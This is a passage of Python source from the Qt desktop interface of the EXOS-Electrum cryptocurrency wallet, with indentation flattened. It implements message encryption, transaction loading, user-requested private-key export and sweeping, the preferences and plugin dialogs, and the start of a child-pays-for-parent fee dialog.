b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_exos.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("EXOS-Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_exos import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a EXOS URI
if str(data).startswith("exos:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("EXOS-Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_exos import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'exos-electrum-private-keys.csv'
select_msg = _('Select file and location to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
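# Private keys are derived in a background thread, one per 0.1 s tick, so the
# dialog stays responsive; progress is pushed through computing_privkeys_signal
# and the done/cancelled flags let either side abort before disconnecting.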
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("EXOS-Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
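# Output format note: the CSV branch writes a header row plus one row per key
# ("%34s" pads addresses to a width of 34 characters); the JSON branch dumps
# the same address -> private-key mapping as an indented object.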
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_exos.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: Fee rate is based on average confirmation time estimates'),
_('Mempool based: Fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', True))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 EXOS = 1000 mEXOS. \n1 mEXOS = 1000 µEXOS. \n1 µEXOS = 100 exo.\n\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_exos import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat by obfuscating your actual transaction amount.') + '\n' +
_('If enabled, at most 100 additional exo could be spent per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart EXOS-Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('EXOS-Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"the sender, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
